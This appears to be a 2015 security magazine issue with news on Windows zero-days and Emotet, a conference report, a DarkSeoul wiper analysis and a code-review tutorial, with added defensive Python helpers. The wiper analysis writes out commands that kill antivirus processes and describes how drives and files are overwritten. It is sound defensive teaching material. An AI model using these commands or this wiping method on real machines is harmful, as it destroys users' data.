Google discloses three unpatched security vulnerabilities in Windows in less than one month

Google's Project Zero team has found three zero-day vulnerabilities in Windows. The Project Zero team often finds vulnerabilities in products from different companies; when the team finds a vulnerability, it is reported to the affected software vendor with a 90-day deadline. After the 90 days, Google automatically discloses the vulnerability to the public.

The First Scenario

Google security researcher James Forshaw discovered a privilege escalation vulnerability in Windows 8.1 that could allow a hacker to modify contents or even take over victims' computers completely, leaving millions of users vulnerable.

The Second Scenario

According to Google's security team, the User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because a normal user would require administrator privileges to do so. "However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user's token, but this changes to impersonating Local System part of the way through," Google said. "Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile."

Third Scenario

The newly discovered bug resides in the CNG.sys implementation, which fails to perform proper token checks. “The issue is the implementation in CNG.sys doesn’t check the impersonation level of the token when capturing the logon session ID (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session,” James Forshaw says in the post disclosing the vulnerability. “This behaviour of course might be design, however not having been party to the design it’s hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client.”

https://code.google.com/p/google-security-research/issues/detail?id=128

U.S. and U.K. have announced plans to stage cyber war games on each other

The United States and the U.K. will stage cyber “war games” together, starting this year, to boost both countries’ resistance to cyberattacks, Britain’s government said on 15 January. The US and the UK are planning a series of joint war games in which cyber-warriors from each side attack the other, to ramp up their cyberdefences. The FBI and the National Security Agency will be involved, along with Britain’s GCHQ and MI5 intelligence and security agencies. The two governments will simulate attacks on banks and the financial sector in London and the U.S., as well as on the British and U.S. governments and commercial banks. The U.K. said that there will be further exercises to test the resilience of national infrastructure. The two governments also plan to team up on a new program to train a new generation of “cyber agents,” officials said. The program will fund students from both countries to research cybersecurity for up to six months, and is expected to start in the academic year that begins in 2016. The closer co-operation on cybersecurity on both sides follows concerns about vulnerabilities in the wake of the devastating cyber-attack on Sony Pictures, which the U.S. has blamed on North Korea and which led to the early release of a number of films and the publication of embarrassing private correspondence and personal data. In another incident, the Twitter and YouTube accounts of the U.S. military’s Central Command were compromised earlier by hackers claiming to support the Islamic State militant group.

http://www.bbc.com/news/uk-30842597

Chinese Hackers Stole F-35 Data – Snowden Leaks

Edward Snowden, a former NSA employee, releases a document that reveals an industrial-scale cyber-espionage operation by China to learn the secrets of Australia’s next front-line fighter aircraft, the US-built F-35 Joint Strike Fighter (JSF). Chinese spies allegedly stole as much as 50 terabytes of data, including details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gases and the method the jet uses to track targets.

So far, the F-35 Lightning II JSF is the most expensive defense project in US history. The fighter aircraft, manufactured by US-based Lockheed Martin, was developed at a cost of around $400 billion (£230 billion), the BBC reports on the case.

The documents leaked by Snowden also revealed an NSA spying operation on China’s espionage agencies. According to the documents, the NSA hacked into the computer of a senior Chinese military official and stole information about Chinese intelligence targets in the US government and other foreign governments.

Emotet Banking Malware targets German Users

A new variant in the Win32/Emotet family is targeting banking credentials with a new spam email campaign, Microsoft says. The emails include fraudulent claims, such as fake phone bills, and invoices from banks or PayPal.

The malware, identified as Emotet, was discovered by HeungSoo Kang of Microsoft’s Malware Protection Center. The center was able to identify a sample of the spam email message, written in German and including a link to a compromised website. This indicates that the campaign primarily targeted German-language speakers and banking websites.

Emotet is able to pull credentials from a variety of email programs, including Outlook and Mozilla’s Thunderbird, and from instant messaging programs such as Yahoo Messenger and Windows Live Messenger.

On infected machines, Emotet downloads a configuration file containing a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic.

All the stolen information is sent back to Emotet’s “command and control (C&C) server where it is used by other components to send spam emails to spread the threat,” Kang wrote. “We detect the Emotet spamming component as Spammer:Win32/Cetsiol.A.”

http://blogs.technet.com/b/mmpc/archive/2015/01/06/emotet-spam-campaign-targets-banking-credentials.aspx


New & News

Regional Cyber Security Summit 2015

Towards the Future of Cyber Attacks

The ITU Arab Regional Cyber Security Center is organizing the fourth Regional Cyber Security Summit in cooperation with Bluekaizen. The Information Technology Authority, through Oman National CERT (OCERT), hosts the summit on March 29th – 30th in Muscat, Oman.

The last decade has demonstrated a significant change in international security. Rapidly evolving cyber warfare techniques and emerging threats to government functions, industry, commerce, healthcare, social communication and personal information have created a whole new security environment that grows more dangerous over time. Preparing for future security threats has become inevitable; security tools and techniques must evolve to better protect the data. The moment we think we are safe is the moment we are faced with irrefutable damages.

The Regional Cyber Security Summit 2015 focuses on expected future threats and countermeasures, and also aims at connecting the public, private and academic sectors, with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss and formulate strategic directions and plans to tackle emerging threats to the global and regional security sector.


New & News

Cairo Security Camp 2014: 5 years of sharing knowledge

5 years of Success

BK Team

The largest information security conference of its type in the Middle East and North Africa was held from 25th to 29th November 2014, gathering IT professionals and security practitioners from throughout the region in order to improve the information security field in the MENA region and to share different views on different information security topics.

After 4 years of holding CSCAMP, the fourth edition, CSCAMP2014, was a little bit different. This year we increased the activities to include a Job Fair, the Security Kaizen Congress, Security Awards and others, beside two conference rooms: one only for technical sessions (the Security Kaizen Labs room) and the other for different security topics. And, as usual, a capture the flag (CTF) challenge.


This year the conference included different discussion sessions covering different aspects of the information security domain, including malware analysis, forensics, advanced topics in security and case studies. A set of remarkable sessions in advanced topics and case studies were presented; one of them was given by Omar Sherin, CIIP Manager at Q-CERT, discussing technical challenges and active threats facing critical infrastructures in different countries through a small practical experiment.

Also a unique session was presented by Tim Willis from Google about debugging the internet.

Another advanced session was about mobile forensics, covered by Adel Abdelmoneim, regarding the fundamentals of digital forensics with a special focus on mobile devices. Through many practical examples, participants learned how to extract information (Facebook info, WhatsApp, SMS, images and EXIF information, etc.) from the suspect device.

Special training was also held from 25th to 27th November on Advanced Android and iOS Hands-on Exploitation, covered by Aseem Jakhar, Director, Research, Payatu Technologies (http://payatu.com). This training took a deep dive into all the components of the Android operating system, starting right from ARM assembly, shellcoding, buffer overflows, OS security, the app security model and reverse engineering, through to app security and exploitation.

Mr. Tim Willis


Another interesting topic was “The Usual Rants”, presented by Aseem Jakhar, focusing on simple issues that are plaguing the industry: common myths and old beliefs which need to change for a better and more secure enterprise world.

A new set of sessions was introduced during this year’s conference, covering The Security Challenge Facing Banking Electronic Channels, introduced by Osama Hiji, and Anatomy of the Financial Malware, presented by Dr. Ahmed Shosha.

The CTF (Capture the Flag) was a major part of CSCAMP2014. The CTF contest was designed to serve as an educational exercise, giving participants experience in securing a machine, as well as in conducting and reacting to the sort of attacks found in the real world. Reverse engineering, network sniffing, protocol analysis, system administration, programming and cryptanalysis are all skills which have been required by prior CTF contests at Cairo Security Camp.

balalaika cr3w team

Mr. Aseem Jakhar

Pre-qualification was based on 4 levels that CTF players were able to proceed through within a time frame of 3 days. The challenges were divided into several types, as follows:

1- Web
2- Exploitation
3- Reversing
4- Bonus round

Two teams played the final round at Cairo Security Camp. The winning team was balalaika cr3w with a score of 2100 points, and the runner-up was Null with 1050 points.

In conclusion, the conference this year was unique in the variety of topics covered, especially financial malware. The innovative techniques in threat analysis and forensics were also very interesting, introducing hands-on work and the efforts made in threat analysis and forensics. Case studies and best practices were also introduced and, as every year, the advanced topics and debate sessions open up new aspects for infosec specialists in Egypt and the Arab world.


Win32:DarkSeoul-C / Trojan.Win32.EraseMBR.b

Executive Summary

Reviews

Malware Review

This malware deletes the MBR from the hard drives connected to the system, and it deletes files and folders on Windows versions newer than XP. The malware doesn’t modify the registry to achieve persistence, as the infected machine won’t survive the next reboot. There is no network activity.

AbdELRahman Hesham, ITI Cyber Security Student


Identification

MD5: 0a8032cd6b4a710b1771a080fa09fb87
SHA256: 510f83af3c41f9892040a8a80b4f3a4736eebee2ec4a7d4bfee63dbe44d7ecff
Detection ratio: 49 / 56 (VirusTotal)

Static analysis

The sample imports only two DLLs (kernel32, ntdll). These are mandatory libraries loaded by most executables, and they don’t give a hint about the functionality of the sample. But the kernel32 library contains functions that allow any executable to load libraries that are not in the import table; these functions are LoadLibrary and GetProcAddress. The technique works as follows:

1. First the executable passes the name of the required library as an argument to the LoadLibrary function, which returns a handle to the loaded module if it succeeds.
2. When the library is successfully loaded in memory, the executable calls the GetProcAddress function with the name of the required function in the loaded library and the module handle as arguments.
3. Then the executable can call the function using the address returned by GetProcAddress.

This technique is used to hide the functionality of the malware, as it cannot be seen during static analysis, especially if the names of the library and the function are obfuscated or encrypted.

Dynamic analysis

The code starts with unusual, non-malicious code: the third instruction calls the fourth instruction, and the return address saved by the call, which is the address of the fourth instruction, is put in EAX. The code then enters a loop to calculate some addresses and store them in memory (calculating the addresses at runtime hides information from static analysis, as the addresses called are not known until the sample is running). The sample calculates 27 addresses and stores them in memory starting from memory location 004026CC. The code then calls one of the 27 addresses (004023A0).

This function accesses the FS segment register to reach the TEB. The TEB is the thread environment block, which contains information about the currently running thread. The structure of the TEB is not documented by Microsoft; nevertheless, the information we need is available online [http://www.nirsoft.net/kernel_struct/vista/TEB.html]. The function accesses offset 0x30 in the TEB, so we need to know what is at this offset:

- The first member is a struct (NT_TIB). This struct contains 6 pointers (every data type whose name starts with P is a pointer). Pointers in 32-bit executables have a size of 4 bytes. It also contains a union; a union allocates the biggest size among its members, and this one contains an unsigned long and a pointer, both of size 4 bytes. So the total size of the NT_TIB struct is 7 * 4 = 28 bytes.
- Then there are another 5 pointers (two of them inside the CLIENT_ID structure), of size 5 * 4 = 20 bytes.

20 + 28 = 48 bytes (0x30).

So offset 0x30 in the TEB is the PEB, according to the unofficial documentation.

The function then accesses offset 0x0C in the PEB structure (documentation of the structure can be found here).

The member at offset 0x0C is PPEB_LDR_DATA, a pointer to the PEB_LDR_DATA structure.

Then it uses offset 0x14 in PEB_LDR_DATA, which points to InMemoryOrderModuleList, a linked list of LDR_DATA_TABLE_ENTRY elements.

Offset 28 in this structure is not documented, but it seems that it yields the name of the loaded module. Then there is a loop that processes the module name to calculate a hash value, which is compared with a hardcoded value after the loop.

This loop searches for the entry point of kernel32.dll (the calculated value matches the hardcoded value), and then the function returns this address.

Then the function at 0x004023DD is called twice, to find the addresses of the LoadLibraryA and GetProcAddress functions.
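The two steps above are exactly the ones an analyst ends up reproducing by hand: checking that the field layout really puts the PEB pointer at 0x30, and working out which module name a hardcoded hash stands for. The Python below is an added example, not part of the original analysis. It lays out the start of the 32-bit TEB with ctypes (field names from the public layout the text references, with c_uint32 standing in for every 32-bit pointer so the sizes are right on any host) and re-implements a module-name hash loop so a hardcoded constant can be matched against a list of candidate DLL names. The hash algorithm and the candidate list are assumptions for the demonstration; the sample's real hash routine is not given in the article.

```python
import ctypes


# 32-bit TEB prefix reconstructed from the public field order (assumption: this
# mirrors the unofficial layout referenced in the text). c_uint32 replaces each
# 32-bit pointer so ctypes.sizeof() matches a 32-bit process on any host.
class NT_TIB32(ctypes.Structure):
    _fields_ = [
        ("ExceptionList", ctypes.c_uint32),
        ("StackBase", ctypes.c_uint32),
        ("StackLimit", ctypes.c_uint32),
        ("SubSystemTib", ctypes.c_uint32),
        ("FiberData", ctypes.c_uint32),          # union { FiberData; Version }, 4 bytes
        ("ArbitraryUserPointer", ctypes.c_uint32),
        ("Self", ctypes.c_uint32),
    ]


class CLIENT_ID32(ctypes.Structure):
    _fields_ = [
        ("UniqueProcess", ctypes.c_uint32),
        ("UniqueThread", ctypes.c_uint32),
    ]


class TEB32(ctypes.Structure):
    # Only the members up to the PEB pointer, which is all the text walks through.
    _fields_ = [
        ("NtTib", NT_TIB32),
        ("EnvironmentPointer", ctypes.c_uint32),
        ("ClientId", CLIENT_ID32),
        ("ActiveRpcHandle", ctypes.c_uint32),
        ("ThreadLocalStoragePointer", ctypes.c_uint32),
        ("ProcessEnvironmentBlock", ctypes.c_uint32),
    ]


def teb_offsets():
    """The sizes and offsets the article computes by hand."""
    return {
        "sizeof_NT_TIB": ctypes.sizeof(NT_TIB32),          # 7 * 4 = 28
        "Peb": TEB32.ProcessEnvironmentBlock.offset,        # 28 + 20 = 0x30
    }


def module_hash(name):
    """Hypothetical stand-in for the malware's name-hashing loop (assumption: the
    real algorithm is not given in the article). Rotate-right-13-and-add over the
    upper-cased ASCII name, kept to 32 bits like the EAX arithmetic it imitates."""
    h = 0
    for ch in name.upper().encode("ascii"):
        h = ((h >> 13) | (h << 19)) & 0xFFFFFFFF
        h = (h + ch) & 0xFFFFFFFF
    return h


# Constructed candidate list: modules normally present in a 32-bit process.
KNOWN_MODULES = [
    "ntdll.dll", "kernel32.dll", "kernelbase.dll",
    "advapi32.dll", "msvcrt.dll", "user32.dll",
]


def identify_module(target_hash, candidates=KNOWN_MODULES):
    """Analyst helper: which candidate module name produces the hardcoded hash?"""
    for name in candidates:
        if module_hash(name) == target_hash:
            return name
    return None


if __name__ == "__main__":
    print(teb_offsets())
    h = module_hash("kernel32.dll")
    print(hex(h), "->", identify_module(h))
```

Once the real hash loop has been lifted from the disassembly, module_hash is the only function to replace; the matching against candidate names stays the same, and the same approach identifies the function names resolved through the routine at 0x004023DD.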

Then it will load dlls using the LoadLibraryA function, and find the addresses of the following functions using the function at 0x004023DD:

1. advapi32.OpenProcessToken
2. advapi32.LookupPrivilegeValueA
3. advapi32.AdjustTokenPrivileges
4. kernel32.OpenFileMappingA
5. kernel32.CreateFileMappingA
6. kernel32.GetWindowsDirectoryA
7. kernel32.InitializeCriticalSection
8. kernel32.CreateThread
9. kernel32.WaitForSingleObject
10. ntdll.RtlLeaveCriticalSection
11. kernel32.GetVersionExA
12. kernel32.Sleep
13. kernel32.GetDriveTypeA
14. ntdll.RtlEnterCriticalSection
15. kernel32.FindFirstFileA
16. kernel32.RemoveDirectoryA
17. kernel32.FindNextFileA
18. kernel32.FindClose
19. kernel32.CreateFileA
20. kernel32.WriteFile
21. kernel32.CloseHandle
22. kernel32.DeleteFileA
23. kernel32.SetFilePointer
24. kernel32.GetSystemDirectoryA
25. kernel32.GetDiskFreeSpaceA
26. kernel32.GetDiskFreeSpaceExA
27. kernel32.ReadFile
28. kernel32.WinExec
29. kernel32.GetCurrentProcess
30. ntdll.RtlGetLastWin32Error
31. kernel32.LoadLibraryA
32. kernel32.GetProcAddress

Then it loads msvcrt.dll and resolves:
1. msvcrt.strcat
2. msvcrt.memset
3. msvcrt.strcpy
4. msvcrt.memcpy
5. msvcrt.strlen
6. msvcrt.sprintf
7. msvcrt.strcmp
8. msvcrt.malloc
9. msvcrt.free

Then user32.dll:
user32.ExitWindowsEx

The function starting at 0x004011BC tries to open a file mapping object named “JO840112-CRAS8468-11150923-PCI8273V”; if it is found, the malware exits. If it doesn’t find the file mapping object, it creates one. Then the malware passes the following commands to kernel32.WinExec in order to execute them on the system:
a. taskkill /F /IM pasvc.exe, which belongs to http://us.ahnlab.com/
b. taskkill /F /IM clisvc.exe, which belongs to ViRobot ISMS from HAURI

The function call at 00401242 checks the version of the Windows system: if it is older than Windows Vista (Windows XP, Windows 2003 or older), the malware creates a thread that starts execution at 0x00401AA0; otherwise it starts execution at 0x004012D5.

On Windows XP

The function call at 00401d85 clears a buffer of size 0x104 bytes and then stores the string “\\.\PhysicalDrive0” in the buffer. It then opens the file \\.\PhysicalDrive0 and uses the kernel32.SetFilePointer function to point to the start of the drive; it reads 512 bytes into a buffer in the heap, and then uses SetFilePointer() to advance the file pointer by 0x7000 bytes. Then it starts writing 512 bytes of the word “PR!NCPESP”, and then sets the file pointer to the beginning of the physical drive and writes another 512 bytes of the word “PR!NCPESP”. It loops to do the same on PhysicalDrive1 to PhysicalDrive9. The malware then sleeps for 5 minutes and shuts down the operating system for the last time.

On operating systems newer than Windows XP (Windows 7, for example), the malware creates another thread after destroying the MBR; this thread is responsible for deleting files and folders on the hard drive. This thread works as follows:

1. It loops to check all drives from B:\ to Y:\. If the drive exists, it performs another check to see whether it is the drive that contains the operating system or not.
   a. If it contains the operating system, it stores the drive path for use after the current loop.
   b. If it is not the operating system drive, it processes the drive in the loop.
2. The processing of valid drives is the same for the drive that contains the operating system and for the other valid drives; the only difference is that the malware creates a new thread for every other valid drive and processes the drive that contains the operating system on the current thread.
3. The processing done on drives (function at address 0x004015ED) is that the malware traverses the folders in the drive using the FindNextFile() function and appends *.* to the current directory path.
4. It overwrites the content of every file with the word “PR!NCPESP” multiple times, and then deletes the file, making file recovery impossible.
5. It avoids deleting files in c:/program files, c:/program data and c:/windows.
6. It creates a thread for deep paths (3 nested folders).

After five minutes, the malware shuts down the PC using the following methods:
1. kernel32.WinExec(“shutdown -r -t 0”)
2. user32.ExitWindowsEx()
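The observable artefacts in this analysis (the 512-byte runs of “PR!NCPESP” at the start of the physical drive and at offset 0x7000, and the two taskkill commands passed to WinExec) translate directly into triage checks for an incident responder. The Python below is an added example and not from the article: it scans a raw disk image for the wiper pattern at the two offsets the sample writes, and flags process-creation log lines that force-kill the named AV processes. The disk image and the log lines are constructed inside the script for the demonstration, and the log line format is an assumption.

```python
import re

# Indicators taken from the analysis above.
WIPER_MARKER = b"PR!NCPESP"
SECTOR = 512
MARKER_OFFSETS = (0, 0x7000)            # MBR sector and the offset the sample seeks to
KILLED_PROCESSES = {"pasvc.exe", "clisvc.exe"}
TASKKILL_RE = re.compile(r"taskkill\s+/F\s+/IM\s+(\S+)", re.IGNORECASE)


def marker_sector(length=SECTOR):
    """One sector filled with the repeated marker word, the way the sample writes it."""
    reps = length // len(WIPER_MARKER) + 1
    return (WIPER_MARKER * reps)[:length]


def sector_is_wiped(sector, threshold=0.9):
    """A sector counts as wiped when the marker covers at least `threshold` of it
    (tolerates any alignment of the 9-byte word inside the 512-byte run)."""
    covered = sector.count(WIPER_MARKER) * len(WIPER_MARKER)
    return len(sector) == SECTOR and covered >= threshold * SECTOR


def scan_disk_image(image):
    """Return the offsets in `image` (raw drive bytes) that carry the wiper pattern."""
    return [off for off in MARKER_OFFSETS
            if sector_is_wiped(image[off:off + SECTOR])]


def suspicious_taskkills(log_lines):
    """Return (line, process) pairs for process-creation log lines that force-kill
    one of the AV processes the sample targets."""
    hits = []
    for line in log_lines:
        m = TASKKILL_RE.search(line)
        if m and m.group(1).lower() in KILLED_PROCESSES:
            hits.append((line, m.group(1).lower()))
    return hits


def build_sample_image(wiped):
    """Constructed 0x8000-byte drive image: a healthy-looking MBR in sector 0 and
    filler elsewhere; `wiped=True` applies the two overwrites described above."""
    image = bytearray(b"\x90" * 0x8000)
    image[510:512] = b"\x55\xaa"                  # boot signature of an intact MBR
    if wiped:
        image[0:SECTOR] = marker_sector()
        image[0x7000:0x7000 + SECTOR] = marker_sector()
    return bytes(image)


# Constructed process-creation log lines (format assumed, not from the article).
SAMPLE_LOG = [
    "2015-01-20 10:02:11 ParentImage=C:\\Users\\bob\\update.exe CommandLine=taskkill /F /IM pasvc.exe",
    "2015-01-20 10:02:11 ParentImage=C:\\Users\\bob\\update.exe CommandLine=taskkill /F /IM clisvc.exe",
    "2015-01-20 10:02:12 ParentImage=C:\\Windows\\explorer.exe CommandLine=taskkill /F /IM notepad.exe",
    "2015-01-20 10:02:13 ParentImage=C:\\Windows\\explorer.exe CommandLine=cmd.exe /c dir",
]

if __name__ == "__main__":
    print("wiped image hits:", [hex(o) for o in scan_disk_image(build_sample_image(True))])
    print("clean image hits:", scan_disk_image(build_sample_image(False)))
    for line, proc in suspicious_taskkills(SAMPLE_LOG):
        print("AV kill attempt:", proc, "<-", line)
```

The taskkill check is the earlier of the two signals: it fires before the MBR is touched, while the disk-image check is what confirms the damage on a drive pulled after the forced reboot. Because the sample runs the same overwrite on PhysicalDrive1 to PhysicalDrive9, every attached drive image should be scanned, not only the system drive.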

Reviews

Code Review

Finding vulnerabilities in any application is a daunting task for security researchers, and these researchers are increasingly engaging with different approaches and methodologies to hunt down vulnerabilities. Some of the common approaches or methodologies are black box testing and white box testing.

In the black box testing approach the researcher doesn’t have any working knowledge or background of the application; they have to do enumeration of technologies, mapping of the application and identification of fault entry points, determining input validation vulnerabilities or logical security vulnerabilities.

White box testing involves having the source code of the application and a proper understanding of the application as well as its purpose, background, environment and framework, to best identify key areas of focus.

In software development, a small coding error can result in a critical vulnerability that ends up compromising the security of an entire system or network. Source code review is probably the single most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. This task can be carried out either with commercial or free automated tools, or by a manual review of the code, which requires human interaction.

Manual Source Code Review

Overview


Shaikh Rashid, Cyber Security Consultant and Security Researcher


Introduction

Manual source code review provides insight into the “real risk” associated with insecure code. This is the single most important value of a manual approach. A human reviewer can understand the context of certain coding practices and make a serious risk estimate that accounts for both the likelihood of attack and the business impact of a breach. Manual source code review is a time-consuming process, but this lengthy process can be shortened if we know properly which areas to investigate. Although many tools are available, proper knowledge of manual code review is still required.

Basics

The first and foremost requirement of code review is that you should have a basic understanding of at least one object-oriented framework, i.e. J2EE or .NET. Knowledge of PHP is also fine.

Application Details

The next and most important step is to understand how the application works and what its settings are. Therefore the entry point of the code review will be the deployment descriptor (web.xml in J2EE, web.config in .NET). In web service testing it’s very important to understand the application: what is it doing, what are the business requirements? Analyze the behavior of the application. Have an idea of the data flow. Explore the application and mine out important details such as the APIs and libraries used.

Note: In PHP there is no configuration file present if no framework is used.

Following is the checklist for code review:
• Authentication & Authorization
• Cryptography
• Respecting boundaries (input validation & output encoding)
• Session management
• Threat Modeling

Terminology

Following is the terminology which a code reviewer should be aware of:
• Trust zone: the user of the application
• Taint: user-provided malicious data
• Taint propagator: a function that takes malicious data as input and passes it on without validation
• Source: the point where the malicious input was given, e.g. request.getParameter() is a source
• Sink: the place where the vulnerability gets executed, e.g. the place where XSS alerts get reflected

1. Configuration Management
Study the configuration file (deployment descriptor) properly; it tells a lot about the deployment. For example, if you want to see what HTTP methods are used, you can see it in web.xml. web.xml is present in WEB-INF; on viewing it we found the setting shown in Figure 2.

2. Check Whether Custom Error Pages are Defined
If the application developer wants, he can set a custom error page for an error code in web.xml, as shown in Figure 1.

Figure 1: Use of custom pages for error code 404

Figure 2: Use of dangerous HTTP methods

Figure 3: Transport-guarantee not set properly

Remediation: Provide a custom error page to avoid leakage of sensitive information. Disable dangerous HTTP methods; use only the GET and POST methods to be on the safer side.

3. Listing of HTTP Methods Enabled
Under the http-method tag you can see the methods enabled (refer to Figure 2).

4. Data Protection in Storage & Transit
The setting in Figure 3 shows that the transport guarantee is NONE, which means that there is no HTTPS setting provided in the application. So anybody can intercept the communication.

Remediation: The setting for transport-guarantee should be CONFIDENTIAL, as shown in Figure 4.
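Checks 2, 3 and 4 above are all answered by reading the deployment descriptor, which makes them easy to automate as a first pass before the manual review. The Python below is an added example (not from the article, and not the application it reviews): it parses a web.xml and reports missing custom error pages, HTTP methods other than GET and POST listed under http-method, and a transport-guarantee that is not CONFIDENTIAL. The two descriptors are constructed for the demonstration; the namespace stripping lets the same checker run on a namespaced Java EE descriptor and on a plain one.

```python
import xml.etree.ElementTree as ET

SAFE_METHODS = {"GET", "POST"}


def _local(tag):
    """Strip an XML namespace ({uri}name -> name) so namespaced and plain web.xml both work."""
    return tag.rsplit("}", 1)[-1]


def _all(root, name):
    """Every element in the document with the given local tag name."""
    return [e for e in root.iter() if _local(e.tag) == name]


def _text(elem):
    return (elem.text or "").strip()


def review_web_xml(xml_text):
    """Apply the article's checks 2, 3 and 4 to a deployment descriptor; return findings."""
    root = ET.fromstring(xml_text)
    findings = []

    # 2. custom error pages: report the error codes that have none
    codes = {_text(c) for ep in _all(root, "error-page")
             for c in ep if _local(c.tag) == "error-code"}
    for code in ("404", "500"):
        if code not in codes:
            findings.append("no custom error page for HTTP " + code)

    # 3. HTTP methods listed in security constraints beyond GET and POST
    for m in _all(root, "http-method"):
        if _text(m).upper() not in SAFE_METHODS:
            findings.append("dangerous HTTP method enabled: " + _text(m))

    # 4. transport guarantee must be CONFIDENTIAL (HTTPS only)
    guarantees = _all(root, "transport-guarantee")
    if not guarantees:
        findings.append("no transport-guarantee set (no HTTPS requirement)")
    for g in guarantees:
        if _text(g).upper() != "CONFIDENTIAL":
            findings.append("transport-guarantee is %s, should be CONFIDENTIAL"
                            % (_text(g) or "empty"))
    return findings


# Constructed deployment descriptors for the demonstration.
WEAK_WEB_XML = """<web-app>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>admin</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>PUT</http-method>
      <http-method>DELETE</http-method>
    </web-resource-collection>
    <user-data-constraint>
      <transport-guarantee>NONE</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
</web-app>"""

HARDENED_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee">
  <error-page><error-code>404</error-code><location>/error.jsp</location></error-page>
  <error-page><error-code>500</error-code><location>/error.jsp</location></error-page>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>admin</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
      <http-method>POST</http-method>
    </web-resource-collection>
    <user-data-constraint>
      <transport-guarantee>CONFIDENTIAL</transport-guarantee>
    </user-data-constraint>
  </security-constraint>
</web-app>"""

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_WEB_XML), ("hardened", HARDENED_WEB_XML)):
        print(name + ":", review_web_xml(doc) or ["no findings"])
```

One caveat for a real review: listing methods inside a security-constraint scopes that constraint to those methods, so the methods that are not listed are left uncovered by it. Servlet 3.1 containers accept a deny-uncovered-http-methods element to close that gap, and the reviewer should check for it alongside the checks above.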


Figure 4: Transport-guarantee setting should be Confidential

Figure 5: SafePass variable storing encrypted value of password

Figure 7: Password hard coded as comment

Figure 8: ‘User ID’ passed as hidden parameter.

Figure 9: Code for updating profile

Figure 6: SHA for password hash

5. Hashing of Password
A weak hashing algorithm was used for the password, i.e. SHA1. If you look at the code shown in Figure 5, it seems there is encryption of the password, but on opening up the definition of the encrypt method of the crypto class (Figure 6) we can see that hashing of the password is done using SHA, but which SHA algorithm is used is not known.

If “SHA” is given as the algorithm name in MessageDigest.getInstance, it takes SHA1 by default; the same is happening in this case (refer to Figure 6). SHA1 is a weak hashing algorithm.

Remediation: A strong hashing algorithm should be used to store the password in hashed form. There should be proper salting of the hashed data, and the salt used should be different for each user. If you are using some encryption algorithm, it should be strong enough. In the coming years, if computational resources become cheaper, it may be possible to crack the encryption. Therefore, to delay an attacker from decrypting your data, you can increase the number of iterations of the algorithm.
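The remediation has three parts, a per-user salt, a strong algorithm and a tunable iteration count, and they are easiest to see side by side with the weak form. The Python below is an added example, not the code from Figures 5 and 6: legacy_sha1 reproduces the unsalted SHA-1 the review found, hash_password replaces it with salted, iterated PBKDF2-HMAC-SHA256 from the standard library, and the stored string records its own iteration count so the work factor can be raised later without invalidating existing records. Password values and iteration counts in the example are constructed.

```python
import base64
import hashlib
import hmac
import os

# Work factor; raise it over time as hardware gets cheaper (the article's point on iterations).
DEFAULT_ITERATIONS = 600_000


def legacy_sha1(password):
    """The weak form found in the review: unsalted SHA-1, so equal passwords give
    equal hashes and a precomputed table cracks them all at once."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password, iterations=DEFAULT_ITERATIONS, salt=None):
    """Salted, iterated PBKDF2-HMAC-SHA256. The result is self-describing
    (algorithm$iterations$salt$hash) so verification never needs external state."""
    salt = salt if salt is not None else os.urandom(16)      # fresh salt per user
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "pbkdf2_sha256${}${}${}".format(
        iterations,
        base64.b64encode(salt).decode("ascii"),
        base64.b64encode(dk).decode("ascii"),
    )


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(dk_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, int(iterations))
    return hmac.compare_digest(dk, expected)


def needs_rehash(stored, minimum=DEFAULT_ITERATIONS):
    """True when a record was made with fewer iterations than current policy;
    rehash it transparently at the user's next successful login."""
    return int(stored.split("$")[1]) < minimum


if __name__ == "__main__":
    print("sha1 of equal passwords is equal:", legacy_sha1("Winter2015") == legacy_sha1("Winter2015"))
    a = hash_password("Winter2015")
    b = hash_password("Winter2015")
    print("pbkdf2 records differ (salt):", a != b, "| verify:", verify_password("Winter2015", a))
```

The needs_rehash helper is what makes the iteration advice workable in practice: the policy number lives in one constant, and old records are upgraded as users log in rather than by a forced reset.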

6. Hard Coded Password Case
Sometimes developers put a hardcoded password in a JSP page as a comment. In Figure 7 the first comment (marked in red as 1) is a JSP comment and the other is an HTML comment (marked as 2). The HTML comment is visible on the web page (since it is a JSP page, HTML comments won’t work as hidden comments). Even the JSP comments can be viewed by view source.

7. Authorization
The case of CSRF (bypassing authorization): ‘My profile is better than yours because I have updated it’. Sometimes developers have the wrong notion that sending parameters or a session token as a hidden field, or obscuring them with programming terminology, would hide them from the eyes of an attacker. An example of this is depicted in Figure 8.

There is code for updating accounts, as shown in Figure 9.

The code in Figure 9 would update an account on the basis of ‘userid’, a crucial parameter passed as a hidden parameter. This coding flaw can be used by an attacker who makes his own web page with the same update action as the application; he will also have the victim’s session ID,


Figure 10: User ID getting passed as cookie

Figure 12: Logging of password in plaintext

Figure 11: Use of blacklisting

Figure 13: Creation of a malicious class by attacker

which would update the profile of the victim. The cause of this attack is a weak authorization process which updates data on the basis of a parameter without validating whether the parameter is coming from a legitimate user or not.

